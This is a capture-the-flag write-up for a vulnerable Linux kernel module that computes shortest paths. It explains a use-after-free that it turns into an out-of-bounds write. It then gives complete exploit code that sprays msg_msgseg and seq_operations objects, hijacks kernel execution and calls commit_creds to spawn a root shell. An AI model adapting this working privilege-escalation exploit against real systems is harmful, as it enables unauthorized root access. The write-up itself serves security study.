Problem

Environment

  • linux version: 5.9.11
    • No SMAP
    • No SMEP
    • No KPTI

Module

The source code of module is not provided, but the challenge gives us the demo program using it.

      /*
 * This is a demo program to show how to interact with SPARK.
 * Don't waste time on finding bugs here ;)
 *
 * Copyright (c) 2020 david942j
 */

#include <assert.h>
#include <fcntl.h>
#include <linux/spark.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <unistd.h>

#define DEV_PATH "/dev/node"

#define N 6
static int fd[N];
const char l[] = "ABCDEF";

/*
    B -- 10 -- D -- 11 -- F
   / \         |
  4   |        |
 /    |        |
A     5        4
 \    |        |
  2   |        |
    \ |        |
      C -- 3 - E
 */
static void link(int a, int b, unsigned int weight) {
  printf("Creating link between '%c' and '%c' with weight %u\n", l[a], l[b],
         weight);
  assert(ioctl(fd[a], SPARK_LINK, fd[b] | ((unsigned long long)weight << 32)) ==
         0);
}

static void query(int a, int b) {
  struct spark_ioctl_query qry = {
      .fd1 = fd[a],
      .fd2 = fd[b],
  };
  assert(ioctl(fd[0], SPARK_QUERY, &qry) == 0);
  printf("The length of shortest path between '%c' and '%c' is %lld\n", l[a],
         l[b], qry.distance);
}

int main(int argc, char *argv[]) {
  for (int i = 0; i < N; i++) {
    fd[i] = open(DEV_PATH, O_RDONLY);
    assert(fd[i] >= 0);
  }
  link(0, 1, 4);
  link(0, 2, 2);
  link(1, 2, 5);
  link(1, 3, 10);
  link(2, 4, 3);
  link(3, 4, 4);
  link(3, 5, 11);
  assert(ioctl(fd[0], SPARK_FINALIZE) == 0);
  query(0, 5);
  query(3, 2);
  query(2, 5);

  for (int i = 0; i < N; i++) close(fd[i]);
  return 0;
}

As we can see in demo.c, this module is for a shortest path search. And each node can be allocated by open and two nodes can be linked by link. The searching path is done by query.

I think these are all knowlege which we can know from demo.c. So I do reserving spark.ko. The module has 4 features: link, finalize, query, get_info.

Vulnerability

The vulnerability is in spark_node_put. When we close the node and if the reference count is one, free the node itself and its double linked list nodes. But when free the node, the node in other node (which is linked with the closed node) is not freed.

For example, we allocate 2 nodes(node A and node B) via open and link them. The node A’s fd and bk has the pointer to node B. And of course, node B has the pointer to node A in fd and bk. After linking, if we close node B, the node B is free-ed but the pointer in node A is not deleted.

The fd and bk in each node are used in spark_node_finalize and spark_graph_query.

Exploit

Trigger UAF

As I explained in above, the UAF can be caused by following code:

int fds[2];
for (int i = 0; i < sizeof(fds) / 4; ++i) {
  fds[i] = open(VULN_DEV_NAME, O_RDONLY);
}
vuln_dev_link(fds[0], fds[1], 0);
close(fds[1]);

Build fake node

The structure of node and linked list node is like:

typedef struct spark_link_t {
  struct spark_link_t* bk;
  struct spark_link_t* fd;
  struct spark_node_t* target;
  uint64_t weight;
} spark_link_t;
typedef struct spark_node_t {
  uint64_t idx;
  uint32_t ref_cnt;
  uint32_t __padding_0;
  char start_lock[32];
  uint32_t is_finalized;
  uint32_t __padding_1;
  char nb_lock[32];
  uint64_t link_cnt;
  struct spark_link_t* bk;
  struct spark_link_t* fd;
  uint64_t idx_in_table;
  spark_node_table_t* node_table;
} spark_node_t;

And the invalid values in spark_node_t may cause crash. And with several tries I found if start_lock is zeros and bk and fd is correctly set, crash does not occurs.

So, I try finding proper object which can control UAF object and I decide to use struct msg_msgseg. It allocated by user-defined length and user’s data. And the best thing is it can be fully controlled by user!! (except first 8 bytes). Because the first 8 bytes of spark_node_t is index of each node, it can be set any value.

Now we can control the UAF node by struct msg_msgseg.

Prevent crash while finalize

By using struct msg_msgseg and set start_lock with zeros, the crash in mutex_lock can be prevented. But there is the traversal mechanism which travel the linked nodes in traversal. The traversal ends when &node->bk == cur_node->bk.

Since we does not know the address of node, we cannot stop the traversal and this occurs the crash…. However differ my expectation, the crash does not reboot the OS and print kernel’s registers! Morever in the kernel’s registers there is the address of UAF node (R13).

With this observation, I crash the kernel several times and the address of UAF node may not be changed. So I think I can use it.

After one crashing, I set bk and fd with the value of R13+0x60 (this is R12 of panic information) and execute the program, no crash occurs in traversal.

Make invalid node table by finalize

The spark_node_finalize function makes the node table and set each linked node’s index in the table. For example, the graph is following:

    B -- 10 -- D
   / \ 
  4   |
 /    |
A     5
 \    |
  2   |
    \ |
      C -- 3 - E

And if we request finalize on node A, the A’s node_table and idx_in_table of each nodes are set by following:

0: A (its `idx_in_table` is 0)
1: C (its `idx_in_table` is 1)
2: E (its `idx_in_table` is 2)
3: B (its `idx_in_table` is 3)
4: D (its `idx_in_table` is 4)

The node_table and idx_in_table is used in spark_graph_query (And in this function, 8 bytes OOB write can be triggered, explained in later).

Since the environment of this challenge is No-SMAP and No-SMEP and we can controll fd and bk of UAF node, we can insert fake nodes (defined in user-land) to linked list. So for the OOB write I set fake nodes to build node_table like following:

0: A
1: UAF node
2: Fake user-land node
3: Fake user-land node

Trigger OOB write

In spark_graph_query function, there is a following routine:

// ...
temp_dists = (__int64 *)_kmalloc(8 * node_table->size, _GFP_IO | ___GFP_FS | ___GFP_DIRECT_RECLAIM | ___GFP_KSWAPD_RECLAIM);
// ...
bk = cur_node->bk;
for ( end = &cur_node->bk; bk != (spark_link_t *)end; bk = bk->bk )
{
  p_upated_dist = &temp_dists[bk->target->idx_in_table];
  if ( *p_upated_dist != -1 )
  {
    dist_of_this_path = dist_to_cur + bk->weight;
    if ( *p_upated_dist > dist_of_this_path )
      *p_upated_dist = dist_of_this_path;
  }
}
// ...

Because our target (and its idx_in_table) of node_table can be controlld by us, we can write temp_dists with arbitrary index by setting idx_in_table. Furthermore since the weigth of bk node can be controlled by user, we can get arbitrary 8 bytes OOB write.

RIP control

Since the size of node_bale is 4 and then the kamlloc allocate 32 bytes chunk, I decide to use struct seq_operations to control RIP.

We can run user-mode code via RIP control because SMEP is not enabled.

Exploit code

      #include <fcntl.h>
#include <linux/keyctl.h>
#include <stdarg.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/mman.h>
#include <sys/msg.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <syscall.h>
#include <unistd.h>

static void get_enter_to_continue(const char* msg);
static void fatal(const char* msg);

static void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

static void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue("Press enter to exit...");
  exit(-1);
}

struct msgbuf {
  long mtype;    /* message type, must be > 0 */
  char mtext[1]; /* message data */
};
int send_msg(int msgqid, char* data, size_t size, long mtype);
int recv_msg(int msgqid, char* data, size_t size, long mtype);

int send_msg(int msgqid, char* data, size_t size, long mtype) {
  struct msgbuf* m = malloc(sizeof(long) + size);
  int ret = -1;
  memcpy(m->mtext, data, size);
  m->mtype = mtype;

  ret = msgsnd(msgqid, m, size, 0);

  free(m);
  return ret;
}
int recv_msg(int msgqid, char* data, size_t size, long mtype) {
  struct msgbuf* m = malloc(sizeof(long) + size);
  int ret = -1;
  m->mtype = mtype;

  ret = msgrcv(msgqid, m, size, mtype, 0);
  memcpy(data, m->mtext, size);

  free(m);
  return ret;
}

#define VULN_DEV_NAME "/dev/node"
#define VULN_DEV_CMD_LINK 0x4008D900
#define VULN_DEV_CMD_FINALIZE 0xD902
#define VULN_DEV_CMD_QUERY 0xC010D903
#define VULN_DEV_CMD_GET_INFO 0x8018D901

typedef struct query_t {
  int fd1;
  int fd2;
  int64_t distance;
} query_t;
typedef struct node_info_t {
  uint64_t link_cnt;
  uint64_t idx_in_weights;
  uint64_t weights_size;
} node_info_t;
typedef struct spark_link_t {
  struct spark_link_t* bk;
  struct spark_link_t* fd;
  struct spark_node_t* target;
  uint64_t weight;
} spark_link_t;
typedef struct spark_node_table_t {
  uint64_t size;
  uint64_t capacity;
  struct spark_node_t** nodes;
} spark_node_table_t;
typedef struct spark_node_t {
  uint64_t idx;
  uint32_t ref_cnt;
  uint32_t __padding_0;
  char start_lock[32];
  uint32_t is_finalized;
  uint32_t __padding_1;
  char nb_lock[32];
  uint64_t link_cnt;
  struct spark_link_t* bk;
  struct spark_link_t* fd;
  uint64_t idx_in_table;
  spark_node_table_t* node_table;
} spark_node_t;

static int vuln_dev_link(int fd1, int fd2, int weight);
static int vuln_dev_finalize(int fd);
static int64_t vuln_dev_query(int fd, int fd1, int fd2);
static node_info_t vuln_dev_get_info(int fd);

static int vuln_dev_link(int fd1, int fd2, int weight) {
  return ioctl(fd1, VULN_DEV_CMD_LINK,
               (uint64_t)fd2 | ((uint64_t)weight << 32));
}
static int vuln_dev_finalize(int fd) {
  return ioctl(fd, VULN_DEV_CMD_FINALIZE);
}
static int64_t vuln_dev_query(int fd, int fd1, int fd2) {
  query_t qry = {.fd1 = fd1, .fd2 = fd2, .distance = -1};
  if (ioctl(fd, VULN_DEV_CMD_QUERY, &qry)) {
    return -1;
  }
  return qry.distance;
}
static node_info_t vuln_dev_get_info(int fd) {
  node_info_t info;
  ioctl(fd, VULN_DEV_CMD_GET_INFO, &info);
  return info;
}

uint64_t user_cs, user_ss, user_sp, user_rflags;
static void save_state() {
  asm("mov %[u_cs], cs;\n"
      "mov %[u_ss], ss;\n"
      "mov %[u_sp], rsp;\n"
      "pushf;\n"
      "pop %[u_rflags];\n"
      : [u_cs] "=r"(user_cs), [u_ss] "=r"(user_ss), [u_sp] "=r"(user_sp),
        [u_rflags] "=r"(user_rflags)::"memory");
  printf(
      "[*] user_cs: 0x%lx, user_ss: 0x%lx, user_sp: 0x%lx, user_rflags: "
      "0x%lx\n",
      user_cs, user_ss, user_sp, user_rflags);
}

static void get_shell() {
  puts("[+] Get shell!");
  char* argv[] = {"/bin/sh", NULL};
  char* envp[] = {NULL};
  execve("/bin/sh", argv, envp);
}

static void restore_state() {
  asm volatile(
      "swapgs;\n"
      "mov qword ptr [rsp+0x20], %[u_ss];\n"
      "mov qword ptr [rsp+0x18], %[u_sp];\n"
      "mov qword ptr [rsp+0x10], %[u_rflags];\n"
      "mov qword ptr [rsp+0x08], %[u_cs];\n"
      "mov qword ptr [rsp+0x00], %[u_ret];\n"
      "iretq;\n" ::[u_cs] "r"(user_cs),
      [u_ss] "r"(user_ss), [u_sp] "r"(user_sp), [u_rflags] "r"(user_rflags),
      [u_ret] "r"(get_shell));
}

__attribute__((naked)) static void get_root_shell() {
  asm volatile(
      "mov rax, [rsp];\n"
      "sub rax, 0x3185d4;\n"  // rax will be kernel_base
      "mov r15, rax;\n"       // r15 will be kernel_base
      // Call prepare_kernel_cred
      "xor rdi, rdi;\n"
      "add rax, 0xbe9c0;\n"  // rax will be prepare_kernel_cred
      "call rax;\n"
      // Call commit_creds
      "mov rdi, rax;\n"
      "mov rax, r15;\n"
      "add rax, 0xbe550;\n"  // rax will be commit_creds
      "call rax;\n"
      :
      :
      : "rax", "rdi", "r15", "memory");

  restore_state();
}

int main(int argc, char* argv[]) {
  save_state();

  int fds[2];
  puts("[*] Alloc 2 nodes");
  for (int i = 0; i < sizeof(fds) / 4; ++i) {
    fds[i] = open(VULN_DEV_NAME, O_RDONLY);
  }

  puts("[*] Link 2 nodes");
  vuln_dev_link(fds[0], fds[1], 0);

  puts("[*] Trigger UAF and build fake node and fake link");
  close(fds[1]);

  char* msg_mem = malloc(0x2000);
  memset(msg_mem, 'a', 0x2000);
  memset(msg_mem + 0x1000 - 48, 0, 0x1000 + 48);

  char* fake_mem = malloc(0x1000);
  memset(fake_mem, 0, 0x1000);
  spark_node_t* fake_node_1 = (spark_node_t*)fake_mem;
  spark_node_t* fake_node_2 = (spark_node_t*)(fake_mem + sizeof(spark_node_t));
  spark_link_t* fake_link_1 =
      (spark_link_t*)(fake_mem + 2 * sizeof(spark_node_t));
  spark_link_t* fake_link_2 =
      (spark_link_t*)(fake_mem + 2 * sizeof(spark_node_t) +
                      sizeof(spark_link_t));
  spark_link_t* fake_link_3 =
      (spark_link_t*)(fake_mem + 2 * sizeof(spark_node_t) +
                      2 * sizeof(spark_link_t));
  spark_node_t* uaf_fake_node_data = (spark_node_t*)(msg_mem + 0x1000 - 48 - 8);

  printf(
      "[*] fake_node_1: %p, fake_link_1: %p, fake_node_2: %p, fake_link_2: "
      "%p\n",
      fake_node_1, fake_link_1, fake_node_2, fake_link_2);

  if (argc == 2) {
    uint64_t uaf_fake_node_addr =
        strtoull(argv[1], NULL, 16);  // R12(==R13+0x60) of panic
    uaf_fake_node_data->ref_cnt = 3;
    uaf_fake_node_data->idx_in_table = 0xdeadbeef;
    uaf_fake_node_data->bk = (spark_link_t*)fake_link_1;
    uaf_fake_node_data->fd = (spark_link_t*)fake_link_2;

    fake_link_1->target = fake_node_1;
    fake_link_1->bk = (spark_link_t*)fake_link_2;
    fake_link_1->fd = (spark_link_t*)uaf_fake_node_addr;

    fake_link_2->target = fake_node_2;
    fake_link_2->bk = (spark_link_t*)uaf_fake_node_addr;
    fake_link_2->fd = (spark_link_t*)fake_node_1;

    fake_node_1->idx = 0xdeadbeef;
    fake_node_1->ref_cnt = 3;
    fake_node_1->is_finalized = 0;
    fake_node_1->bk = (spark_link_t*)&fake_node_1->bk;
    fake_node_1->fd = (spark_link_t*)&fake_node_1;

    fake_node_2->idx = 0xcafebebe;
    fake_node_2->ref_cnt = 3;
    fake_node_2->is_finalized = 0;
    fake_node_2->bk = (spark_link_t*)&fake_node_2->bk;
    fake_node_2->fd = (spark_link_t*)&fake_node_2;
  } else {
    uaf_fake_node_data->ref_cnt = 1;
  }
  send_msg(1, msg_mem, 0x1000 - 48 + 0x80 - 8, 1);

  puts("[*] Put fake node to node_tables");
  vuln_dev_finalize(fds[0]);

  puts("[*] Modify nodes...");
  fake_node_1->bk = (spark_link_t*)fake_link_3;
  fake_node_1->fd = (spark_link_t*)fake_link_3;
  fake_link_3->bk = (spark_link_t*)&fake_node_1->bk;
  fake_link_3->fd = (spark_link_t*)&fake_node_1->bk;
  fake_link_3->target = fake_node_2;
  fake_link_3->weight = (uint64_t)get_root_shell;
  fake_node_2->idx_in_table = 4;

  puts("[*] Spraying seq_ops...");
  int seq_ops_spray[100];
  for (int i = 0; i < sizeof(seq_ops_spray) / 4; ++i) {
    seq_ops_spray[i] = open("/proc/self/stat", O_RDONLY);
  }
  close(seq_ops_spray[0]);

  if (fake_node_1->idx_in_table != 0) {
    puts("[+] Success to build fake node");
  } else {
    puts("[-] Failed to build fake node");
    return -1;
  }

  int new_nodes[4];
  for (int i = 0; i < sizeof(new_nodes) / 4; ++i) {
    new_nodes[i] = open(VULN_DEV_NAME, O_RDONLY);
    if (i != 0) {
      vuln_dev_link(new_nodes[i - 1], new_nodes[i], 0x100 + i);
    }
  }
  vuln_dev_finalize(new_nodes[3]);

  puts("[*] Trigger OOB and overwrite seq_ops");
  vuln_dev_query(fds[0], new_nodes[1], new_nodes[0]);

  puts("[*] ACE!!");
  for (int i = 0; i < sizeof(seq_ops_spray) / 4; ++i) {
    char buf[1];
    read(seq_ops_spray[i], buf, 1);
  }

  memset(fake_mem, 0, 0x1000);

  return 0;
}

To get a root shell, we need to execute the exploit program twice:

  1. Run the program without any arguments.
  2. Run the program with value of kernel’s R12 register shown by kernel panic.

For example, after executing this program without any arguments, the kernel panic occurs and its information is printed as following:

[   60.936674] BUG: kernel NULL pointer dereference, address: 0000000000000010
[   60.937311] #PF: supervisor read access in kernel mode
[   60.937974] #PF: error_code(0x0000) - not-present page
[   60.938416] PGD de07067 P4D de07067 PUD de06067 PMD 0
[   60.939092] Oops: 0000 [#1] SMP NOPTI
[   60.939439] CPU: 0 PID: 123 Comm: exploit Tainted: G            E     5.9.11 #1
[   60.939824] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[   60.940679] RIP: 0010:traversal+0x52/0x110 [spark]
[   60.941182] Code: c0 75 77 48 8d 50 01 49 89 16 49 89 44 24 70 49 8b 36 49 3b 76 08 0f 84 81 00 00 00 49 8b 5c 24 60 49 83 c4 60 0
[   60.942692] RSP: 0018:ffffc900001d7e10 EFLAGS: 00000207
[   60.943401] RAX: ffff88800ddcaf20 RBX: 0000000000000000 RCX: 00000000000008d3
[   60.943929] RDX: 00000000000008d2 RSI: c1f7a9928c6ca877 RDI: 0000000000031060
[   60.944350] RBP: ffffc900001d7e38 R08: ffffc900001d7d98 R09: 0000000000000000
[   60.944940] R10: 0000000000000000 R11: 0000000000000000 R12: ffff88800dd4fb60
[   60.945509] R13: ffff88800dd4fb00 R14: ffff88800ddcaf80 R15: ffff88800dd4fb10
[   60.946147] FS:  0000000001787380(0000) GS:ffff88800f600000(0000) knlGS:0000000000000000
[   60.946744] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[   60.947116] CR2: 0000000000000010 CR3: 000000000de04000 CR4: 00000000000006f0
[   60.947932] Call Trace:
[   60.948909]  traversal+0xa0/0x110 [spark]
[   60.949412]  spark_node_finalize+0x83/0xb0 [spark]
[   60.949769]  node_ioctl+0x136/0x250 [spark]
[   60.949977]  ? tomoyo_file_ioctl+0x19/0x20
[   60.950249]  __x64_sys_ioctl+0x96/0xd0
[   60.950477]  do_syscall_64+0x37/0x80
[   60.950819]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[   60.951459] RIP: 0033:0x423d3d
[   60.951794] Code: 04 25 28 00 00 00 48 89 45 c8 31 c0 48 8d 45 10 c7 45 b0 10 00 00 00 48 89 45 b8 48 8d 45 d0 48 89 45 c0 b8 10 0
[   60.953022] RSP: 002b:00007fff9334fb60 EFLAGS: 00000246 ORIG_RAX: 0000000000000010
[   60.953536] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 0000000000423d3d
[   60.954020] RDX: 0000000000000000 RSI: 000000000000d902 RDI: 0000000000000003
[   60.954957] RBP: 00007fff9334fbb0 R08: 0000000000000001 R09: 0000000000000000
[   60.955548] R10: 0000000000000000 R11: 0000000000000246 R12: 00007fff9334ff18
[   60.956501] R13: 00007fff9334ff28 R14: 00000000004ae868 R15: 0000000000000001
[   60.957217] Modules linked in: spark(E)
[   60.957834] CR2: 0000000000000010
[   60.958602] ---[ end trace c0dd566a19a98686 ]---
[   60.958973] RIP: 0010:traversal+0x52/0x110 [spark]
[   60.959299] Code: c0 75 77 48 8d 50 01 49 89 16 49 89 44 24 70 49 8b 36 49 3b 76 08 0f 84 81 00 00 00 49 8b 5c 24 60 49 83 c4 60 0
[   60.960089] RSP: 0018:ffffc900001d7e10 EFLAGS: 00000207
[   60.960471] RAX: ffff88800ddcaf20 RBX: 0000000000000000 RCX: 00000000000008d3
[   60.961083] RDX: 00000000000008d2 RSI: c1f7a9928c6ca877 RDI: 0000000000031060
[   60.961918] RBP: ffffc900001d7e38 R08: ffffc900001d7d98 R09: 0000000000000000
[   60.962316] R10: 0000000000000000 R11: 0000000000000000 R12: ffff88800dd4fb60
[   60.962646] R13: ffff88800dd4fb00 R14: ffff88800ddcaf80 R15: ffff88800dd4fb10
[   60.963020] FS:  0000000001787380(0000) GS:ffff88800f600000(0000) knlGS:0000000000000000
[   60.963489] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[   60.963832] CR2: 0000000000000010 CR3: 000000000de04000 CR4: 00000000000006f0
Killed

Then, execute the program with ffff88800dd4fb60 (its R12 value of printed panic information).

Reference